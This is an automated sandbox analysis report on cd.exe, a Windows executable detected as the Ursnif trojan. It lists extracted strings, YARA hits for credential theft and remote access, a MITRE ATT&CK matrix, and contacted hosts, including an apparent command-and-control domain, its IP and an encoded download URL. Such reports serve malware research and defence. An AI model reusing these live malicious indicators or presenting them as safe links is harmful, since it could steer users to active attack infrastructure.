Acrobat\.0DC\InstallerENU_GUIDPATHInstallLocationAcroExch.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\NotificationAppxSOFTWARE\Adobe\Acrobat Reader\\DC\SOFTWARE\Adobe\Acrobat Reader\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 /qn/i msiexec.exe ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn/i msiexec.exeAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstoreAdobe Reader XIRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrd
              Source: cd.exeBinary or memory string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplicationSOFTWARE\Adobe\Adobe Acrobat\{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0DC\InstallerENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\RDCNotificationAppx\ADCNotificationAppx\NotificationAppxSOFTWARE\Adobe\Adobe Acrobat\\DC\SOFTWARE\Adobe\Adobe Acrobat\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 IS_COEX_REPAIR=1 /qn/i msiexec.exe/i AppDoNotTakePDFOwnershipAtLaunch ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qnmsiexec.exeAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Dev
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00401342 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00401342

              Stealing of Sensitive Information:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              Remote Access Functionality:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR
              Source: Yara matchFile source: cd.exe, type: SAMPLE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsService Execution1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              cd.exe60%ReversingLabsWin32.Trojan.Ursnif
              cd.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.2.cd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
              1.3.cd.exe.82998c.0.unpack100%AviraTR/Patched.Ren.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.broofa.com0%URL Reputationsafe
              https://www.google.co.uk/intl/en/about/products0%URL Reputationsafe
              https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=00%Avira URL Cloudsafe
              https://rrchnm.org/0%Avira URL Cloudsafe
              http://menehleibe.com/images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi0%Avira URL Cloudsafe
              http://www.sysinternals.comWindowPositionSOFTWARE0%Avira URL Cloudsafe
              http://ww9.menehleibe.com/0%Avira URL Cloudsafe
              https://www.virustotal.comPOST4e3202fdbe953d628f650229af5b3eb49cd46b2d3bfe5546ae3c5fa48b554e0capikey0%Avira URL Cloudsafe
              https://www.sysinternals.comntdllRtlInitUnicodeStringNtOpenDirectoryObjectNtQuerySectionNtQueryDirec0%Avira URL Cloudsafe
              http://www.sysinternals.comopenFolder0%Avira URL Cloudsafe
              https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comRoot0%Avira URL Cloudsafe
              http://menehleibe.com/0%Avira URL Cloudsafe
              https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com0%Avira URL Cloudsafe
              https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f20%Avira URL Cloudsafe
              https://gertrk.com/favicon.ico0%Avira URL Cloudsafe
              http://www.sysinternals.comopenConnection0%Avira URL Cloudsafe
              http://www.wikipedia.com/0%URL Reputationsafe
              http://www.sysinternals.comFileVersionLegalCopyright0%Avira URL Cloudsafe
              http://menehleibe.com/Root0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              google.com
              142.250.203.110
              truefalse
                high
                menehleibe.com
                173.239.8.164
                truetrue
                  unknown
                  www.google.com
                  142.250.102.106
                  truefalse
                    high
                    mybetterdl.com
                    173.192.101.24
                    truefalse
                      unknown
                      gertrk.com
                      168.119.139.96
                      truefalse
                        unknown
                        p226681.mybetterdl.com
                        173.192.101.24
                        truefalse
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://google.com/false
                            high
                            https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0false
                            • Avira URL Cloud: safe
                            unknown
                            http://menehleibe.com/images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avitrue
                            • Avira URL Cloud: safe
                            unknown
                            http://menehleibe.com/true
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.pngfalse
                              high
                              https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.com/?gws_rd=sslfalse
                                high
                                https://www.google.com/gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=falsefalse
                                  high
                                  https://gertrk.com/favicon.icofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.pngfalse
                                    high
                                    http://www.google.com/false
                                      high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.zotero.org/cd.exefalse
                                        high
                                        https://ims-prod06.adobelogin.comcd.exefalse
                                          high
                                          https://policies.google.com/privacy?hl=en-GB&amp;fg=1&amp;utm_source=ucbsLM1X3BMT.htm.9.drfalse
                                            high
                                            https://ogs.google.com/widget/app/so?bc=1LM1X3BMT.htm.9.drfalse
                                              high
                                              https://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-websitecd.exefalse
                                                high
                                                http://www.broofa.comrs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQcd.exefalse
                                                  high
                                                  https://accounts.google.com/ServiceLogin?hlLM1X3BMT.htm.9.drfalse
                                                    high
                                                    https://crashpad.chromium.org/bug/newcd.exefalse
                                                      high
                                                      https://www.gmu.edu/cd.exefalse
                                                        high
                                                        https://www.google.co.uk/intl/en/about/productsLM1X3BMT.htm.9.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.com/index.php?url_bnm_redirect=http://google.com/?gws_rd=ssl_bnm_redirect=http://{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drfalse
                                                          high
                                                          http://www.sysinternals.comcd.exefalse
                                                            high
                                                            https://www.google.com/log?format=json&hasfast=truers=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drfalse
                                                              high
                                                              http://www.amazon.com/msapplication.xml.7.drfalse
                                                                high
                                                                https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Citecd.exefalse
                                                                  high
                                                                  https://www.virustotal.com/about/terms-of-service%scd.exefalse
                                                                    high
                                                                    http://google.com~DFFAD0E470126C2D77.TMP.7.dr, index[1].htm.9.drfalse
                                                                      high
                                                                      http://www.twitter.com/msapplication.xml5.7.drfalse
                                                                        high
                                                                        https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newcd.exefalse
                                                                          high
                                                                          https://rrchnm.org/cd.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://artsandculture.google.com/partner/museo-reina-sofiaLM1X3BMT.htm.9.drfalse
                                                                            high
                                                                            http://schema.org/WebPageLM1X3BMT.htm.9.drfalse
                                                                              high
                                                                              https://www.elsevier.com/legal/elsevier-website-terms-and-conditionscd.exefalse
                                                                                high
                                                                                https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guidescd.exefalse
                                                                                  high
                                                                                  https://clients2.google.com/service/update2/crxupdate_urlBrowsercd.exefalse
                                                                                    high
                                                                                    https://github.com/Juris-M/citeproc-jscd.exefalse
                                                                                      high
                                                                                      http://www.sysinternals.comWindowPositionSOFTWAREcd.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.google.comLM1X3BMT.htm.9.drfalse
                                                                                        high
                                                                                        http://ww9.menehleibe.com/1G7O03DV.htm.9.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://consent.google.com/s?continueLM1X3BMT.htm.9.drfalse
                                                                                          high
                                                                                          https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Icd.exefalse
                                                                                            high
                                                                                            https://plasma.kde.orgcd.exefalse
                                                                                              high
                                                                                              https://ogs.google.com/widget/callout?prid=19025503LM1X3BMT.htm.9.drfalse
                                                                                                high
                                                                                                https://consent.google.com/d?continueLM1X3BMT.htm.9.drfalse
                                                                                                  high
                                                                                                  https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com/?gws_rd=ssl{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drfalse
                                                                                                    high
                                                                                                    https://www.virustotal.comPOST4e3202fdbe953d628f650229af5b3eb49cd46b2d3bfe5546ae3c5fa48b554e0capikeycd.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://donate.google.com/checkout?campaignid%3D6420545008435200LM1X3BMT.htm.9.drfalse
                                                                                                      high
                                                                                                      https://adservice.google.com/adsid/google/uiLM1X3BMT.htm.9.drfalse
                                                                                                        high
                                                                                                        https://trends.google.com/hottrendsLM1X3BMT.htm.9.drfalse
                                                                                                          high
                                                                                                          https://www.sysinternals.comntdllRtlInitUnicodeStringNtOpenDirectoryObjectNtQuerySectionNtQueryDireccd.exefalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.google.com/url?q=https://www.google.com/chrome/download-chrome-for-search/%3Fbrand%3DOKWLM1X3BMT.htm.9.drfalse
                                                                                                            high
                                                                                                            https://apis.google.comLM1X3BMT.htm.9.dr, rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drfalse
                                                                                                              high
                                                                                                              http://www.sysinternals.comopenFoldercd.exefalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comRoot{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboardingcd.exefalse
                                                                                                                high
                                                                                                                http://www.reddit.com/msapplication.xml4.7.drfalse
                                                                                                                  high
                                                                                                                  https://service.elsevier.com/app/answers/detail/a_id/22094/kw/migrate/supporthub/mendeley/cd.exefalse
                                                                                                                    high
                                                                                                                    https://www.google.com/?gws_rd%3DsslLM1X3BMT.htm.9.drfalse
                                                                                                                      high
                                                                                                                      https://crashpad.chromium.org/cd.exefalse
                                                                                                                        high
                                                                                                                        http://www.nytimes.com/msapplication.xml3.7.drfalse
                                                                                                                          high
                                                                                                                          https://ims-na1-stg1.adobelogin.comcd.exefalse
                                                                                                                            high
                                                                                                                            https://policies.google.com/terms?hl=en-GB&amp;fg=1&amp;utm_source=ucbsLM1X3BMT.htm.9.drfalse
                                                                                                                              high
                                                                                                                              https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2d4a6d4bd[1].htm.9.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://service.elsevier.com/app/answers/detail/a_id/19601/kw/connectivity/supporthub/mendeley/1setUcd.exefalse
                                                                                                                                high
                                                                                                                                https://www.google.com/_/og/promos/LM1X3BMT.htm.9.drfalse
                                                                                                                                  high
                                                                                                                                  https://csl.mendeley.comcd.exefalse
                                                                                                                                    high
                                                                                                                                    http://support.mendeley.com/customer/portal/articles/227955cd.exefalse
                                                                                                                                      high
                                                                                                                                      https://www.elsevier.com/legal/privacy-policycd.exefalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/search?gws_rd%3Dssl%26q%3Dnebulae%26um%3D1%26ie%3DUTF-8%26tbm%3Disch%26csf%3DLM1X3BMT.htm.9.drfalse
                                                                                                                                          high
                                                                                                                                          http://agoogleaday.com/%23date%3D2011-06-04LM1X3BMT.htm.9.drfalse
                                                                                                                                            high
                                                                                                                                            http://creativecommons.org/licenses/by-sa/3.0/cd.exefalse
                                                                                                                                              high
                                                                                                                                              https://service.elsevier.com/app/answers/detail/a_id/19611/kw/duplicates/supporthub/mendeley/Yescd.exefalse
                                                                                                                                                high
                                                                                                                                                http://p.yusukekamiyamane.com/cd.exefalse
                                                                                                                                                  high
                                                                                                                                                  https://play.google.com/log?format=json&hasfast=truers=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contaccd.exefalse
                                                                                                                                                      high
                                                                                                                                                      https://www.mendeley.com/librarycd.exefalse
                                                                                                                                                        high
                                                                                                                                                        https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.comcd.exefalse
                                                                                                                                                          high
                                                                                                                                                          http://citationstyles.org/cd.exefalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com~DFFAD0E470126C2D77.TMP.7.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.sysinternals.comopenConnectioncd.exefalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.youtube.com/msapplication.xml7.7.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/citation-style-language/stylescd.exefalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.wikipedia.com/msapplication.xml6.7.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.live.com/msapplication.xml2.7.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.sysinternals.comFileVersionLegalCopyrightcd.exefalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://citationstyles.orgcd.exefalse
                                                                                                                                                                      high
                                                                                                                                                                      http://menehleibe.com/Root{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown

                                                                                                                                                                      Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      173.192.101.24
                                                                                                                                                                      mybetterdl.comUnited States
                                                                                                                                                                      36351SOFTLAYERUSfalse
                                                                                                                                                                      173.239.8.164
                                                                                                                                                                      menehleibe.comUnited States
                                                                                                                                                                      27257WEBAIR-INTERNETUStrue
                                                                                                                                                                      142.250.102.106
                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      142.250.203.110
                                                                                                                                                                      google.comUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      168.119.139.96
                                                                                                                                                                      gertrk.comGermany
                                                                                                                                                                      24940HETZNER-ASDEfalse

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                      Analysis ID:483177
                                                                                                                                                                      Start date:14.09.2021
                                                                                                                                                                      Start time:16:01:46
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 7m 10s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:cd.exe
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.spre.troj.evad.winEXE@4/27@6/5
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 46.1% (good quality ratio 43.4%)
                                                                                                                                                                      • Quality average: 71.3%
                                                                                                                                                                      • Quality standard deviation: 30.3%
                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      Warnings:
                                                                                                                                                                      Show All
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 23.203.80.193, 172.217.168.67, 20.54.110.249, 40.112.88.60, 152.199.19.161, 20.50.102.62, 80.67.82.235, 80.67.82.211, 23.211.4.86
